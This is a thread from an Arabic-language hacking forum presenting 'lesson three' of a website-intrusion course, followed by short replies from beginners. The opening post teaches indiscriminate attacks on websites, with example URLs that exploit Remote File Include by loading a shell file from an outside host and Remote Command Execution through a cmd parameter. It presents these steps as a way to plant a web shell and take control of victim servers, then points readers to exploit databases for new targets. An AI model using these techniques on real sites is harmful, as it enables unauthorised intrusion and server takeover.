اشترك في قناتنا ليصلك جديدنا

اشترك في قناتنا على اليوتيوب ليصلك جديدنا

كذلك الاعجاب بصفحتنا على الفيسبوك

الدرس الثالث: البحث عن الثغرات ورفع الشيل

الدرس الثالث: البحث عن الثغرات ورفع الشيل


صفحة 1 من 46 12311 ... الأخيرةالأخيرة
النتائج 1 إلى 10 من 455

الموضوع: الدرس الثالث: البحث عن الثغرات ورفع الشيل

  1. #1
    :: إدارة :: Aljyyosh Team Array الصورة الرمزية ASDELY-ScOrPiOn
    تاريخ التسجيل
    Jun 2009
    الدولة
    فلسطين
    المشاركات
    2,706

    افتراضي الدرس الثالث: البحث عن الثغرات ورفع الشيل



    بسم الله الرحمن الرحيم

    السلام عليكم ورحمة الله وبركاته

    تحدثنا في الدروس السابقة عن مفاهيم أختراق المواقع وعن أوامر الينكس

    وسيكون درسنا الثالث:

    البحث عن الثغرات الجديده ورفع الشل (الأختراق العشوائي)

    بداية درسنا هذا ندخل في الجد لتطبيق ماتعلمناه في الدرسين السابقه وبالأخص تطبيق الأوامر
    لتطبيق الأوامر الي تعلمتها تحتاج شل .. والشل لابد تزرعة على موقع عن طريق ثغرات الريموت وهي
    Remote File Include
    commands execution
    وهذي النوعية من الثغرات خــطــيرة جداً
    والسبب انها تنفذ اوامر على السيرفر وممكن تسيطر على الموقع بشكل كامل
    طبعاً يوجد ثغرات اخرى للمواقع لاكن ليست بمستوى هالنوعيه وباقي الثغرات اقل خطوره

    نوضح طريقه عمل نوعية الثغرتين مع تطبيق عملي تجربة بنفسك

    ((Remote File Include))
    طريقه عمل هذي الثغرات هي ربط الشل مع الموقع وهي اكثر الثغرات انتشار الأن
    مثال على شكل استثمار الثغرة
    http://www.google.com/index.php?asde....com/shell.txt?
    -| نفصل الرابط |-
    موقع الضحية: Google
    الملف المصاب بالثغرة: index.php?asdely=
    ملف الشل: www.aljyyosh.com/shell.txt؟
    وبعد التنفيذ اذا الثغرة موجوده والموقع مصاب بها راح تشوف عرض لك الشل .. وهنا يجي وقت تنفيذ الأوامر
    ومثل ماتشوف ان رابط الشل جا بعد علامة " = "
    ايضاً لابد ان يكون الشل بأمتداد .txt يعني ملف نصي وبعد رابط الشل تضع علامة استفهام " ? "

    اما النوعية الثانية
    ((Remote commands execution))
    طريقة عمل هذه النوعية من الثغرات هي تنفيذ الأوامر على طول بدون ماتحط رابط الشل
    مثال على شكل استثمار الثغرة
    www.google.com/index.php?cmd=ls -la
    -| نفصل الرابط |-
    موقع الضحية: Google
    الملف المصاب بالثغرة: index.php?cmd=
    احد اوامر الينكس: ls -la
    وبعد التنفيذ اذا الثغرة موجودة فعلاً راح تشوفه يعرض لك في المتصفح نتيجه الأمر المنفذ
    ولو نفذت مثلاً امر ls -la راح يعرض لك الملفات والمجلدات والتصاريح في المتصفح وبشكل غير مرتب يصعب التفرقه بين الملفات والمجلدات
    ولعرضها بشكل مرتب مثلاً في متصفح الأكسبلور .. من الأعلى تضغط على "عرض" ثم تختار من القائمة "المصدر" وراح يعرض لك نتيجه الأمر في ملف نصي وبيكون بشكل مرتب
    [ثغرة للتطبيق]
    تم إزالة التطبيق بسبب أحد الأطفال
    طبعاً مكان id مثل ماقلنا نكتب الأوامر
    يوجد شرح سريع بالفديو في المرفقات بأسم (r-c-e)


    بعد ماعرفنا طريقه عمل ثغرات الريموت
    ننتقل الى كيفية ايجاد الثغرات الجديدة بأستخدام موقع explot-db
    رابط الشرح من الأخ الغالي بلاك جاغوار

    http://www.aljyyosh.com/vb/showthread.php?t=16954


    تحياتي للجميع
    وللدورة تكملة
    ملاحظة: صور الدرس في المرفقات لكيلا تضيع الصور

    الملفات المرفقة الملفات المرفقة
    التعديل الأخير تم بواسطة She!! Access ; 04-05-2011 الساعة 10:43 PM


  2. #2
    هكر متميز Array الصورة الرمزية صقر العرب
    تاريخ التسجيل
    Dec 2009
    الدولة
    بغداد
    المشاركات
    1,196

    افتراضي رد: الدرس الثالث: البحث عن الثغرات ورفع الشيل

    بارك الله بجهودك اخي الحبيب


  3. #3
    :: إدارة :: Aljyyosh Team Array الصورة الرمزية ASDELY-ScOrPiOn
    تاريخ التسجيل
    Jun 2009
    الدولة
    فلسطين
    المشاركات
    2,706

    افتراضي رد: الدرس الثالث: البحث عن الثغرات ورفع الشيل

    مشكور على مرورك الطيب وبارك الله فيك



  4. #4
    هكر مبتديء Array
    تاريخ التسجيل
    Nov 2009
    المشاركات
    12

    افتراضي رد: الدرس الثالث: البحث عن الثغرات ورفع الشيل

    رح رائع وبأنتظار باقى الدروس

    بالتوفيق يا اخى


  5. #5
    هكر مبتديء Array
    تاريخ التسجيل
    Jan 2010
    المشاركات
    5

    افتراضي رد: الدرس الثالث: البحث عن الثغرات ورفع الشيل

    اخوي انا معك في الشررح بس صدقني جربت بس مانفـع


  6. #6
    هكر مبتديء Array
    تاريخ التسجيل
    Jan 2010
    المشاركات
    5

    افتراضي رد: الدرس الثالث: البحث عن الثغرات ورفع الشيل

    اخوي انا معك في الشرح وكل شي ماشاءا الله عليك بس انا والله انلحست ياخي كل ماجيت ابي اطبق علي موقع مايجي معي وش السيالفه ولله مدري



  7. #7
    هكر مبتديء Array
    تاريخ التسجيل
    Jan 2010
    الدولة
    في القلوب الطيبة
    المشاركات
    69

    افتراضي رد: الدرس الثالث: البحث عن الثغرات ورفع الشيل

    مشكور أخوي على الدرس الرائع وهاذي اول مشاركة لي ,,,
    صح ماني فاهم شي بس منكم ومن خبراتكم استفيد


  8. #8
    هكر مبتديء Array الصورة الرمزية che
    تاريخ التسجيل
    Jan 2010
    الدولة
    Kingdom of hackers
    المشاركات
    21

    افتراضي رد: الدرس الثالث: البحث عن الثغرات ورفع الشيل

    thanxxxxxxxxxxxxxxxxxxxxxxxx


  9. #9
    هكر مبتديء Array
    تاريخ التسجيل
    Jan 2010
    المشاركات
    3

    افتراضي رد: الدرس الثالث: البحث عن الثغرات ورفع الشيل

    اخي اشرح لنا بطريقة افضل وضع الروابط بشكل مناسب ولا تضع بينهم مساحة او فواصل الله الدرس الال والتاني فهمته لكن الدرس ده مش فاهم شيء انا عايز اتعلم وراح ازعجك حتى تفهمني ولن اتركك ابدا حتى تعلمني لوووووول
    انا لا امزح فانا اريد التعلم
    شكرا



  10. #10
    هكر مبتديء Array
    تاريخ التسجيل
    Feb 2010
    المشاركات
    4

    افتراضي رد: الدرس الثالث: البحث عن الثغرات ورفع الشيل

    ِشكرا يا غالى مميز جدا


صفحة 1 من 46 12311 ... الأخيرةالأخيرة

المواضيع المتشابهه

  1. طريقة البحث عن الثغرات وايجادها خاص بالمبتدئين
    بواسطة مدمر القراصنة في المنتدى قسم الثغرات
    مشاركات: 67
    آخر مشاركة: 02-14-2012, 04:32 PM
  2. الدرس الثالث فى اختراق البريد
    بواسطة hellwaheeb في المنتدى منتدى إختراق البريد والايميلات
    مشاركات: 51
    آخر مشاركة: 02-05-2012, 08:25 PM
  3. فتح حساب في موقع dyndns [ الدرس الثالث]
    بواسطة ASDELY-ScOrPiOn في المنتدى قسم اختراق الأجهزة
    مشاركات: 6
    آخر مشاركة: 09-27-2011, 03:08 PM
  4. الدرس الاول - البحث عن الثغرات في ميلوورم وتطبيق على ثغرة Sql injection
    بواسطة الشريف 515 في المنتدى منتدى الإختراق العام
    مشاركات: 3
    آخر مشاركة: 09-28-2010, 01:39 AM
  5. الدرس الثالث في تعليم الhtml
    بواسطة ASDELY-ScOrPiOn في المنتدى لغات برمجة المواقع
    مشاركات: 5
    آخر مشاركة: 08-09-2010, 10:50 PM

وجد الزوار هذه الصفحة بالبحث عن:

ثغرات رفع الشل

طريقة ايجاد الثغرات

كيفية ايجاد الثغرات في المواقع

ثغرة الشل

ثغرة رفع الشل

كيفية صنع الشيل

powered by vbulletin® version 3.8.7 ثغرات

البحث عن ثغرات الموقع ورفع الشل

موقع لايجاد الشيل

ثغرات powered by vbulletin® version 3.8.7

ثغرات الشل

امثله على الثغراتpowered by vbulletin version 3.8.7 ثغرةدوره اختراق المواقع وايجاد الثغرات استغلال ثغره من نوع Apache طريقة استخدام الشيل بعد ايجاد الثغرةاختراق المواقع ورفع الشلكيفية صنع الشلmod_negotiationاستغلالثغرة رفع الشيلبدايه تهكير الموقع ايجاد الثغراتثغرة Version 3.8.7 جيوش هكربرنامج البحث عن ثغرات المواقع ورفع الشلالبحث عن الثغرات ورفع الشيل طريقة صنع الشل

الكلمات الدلالية لهذا الموضوع

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •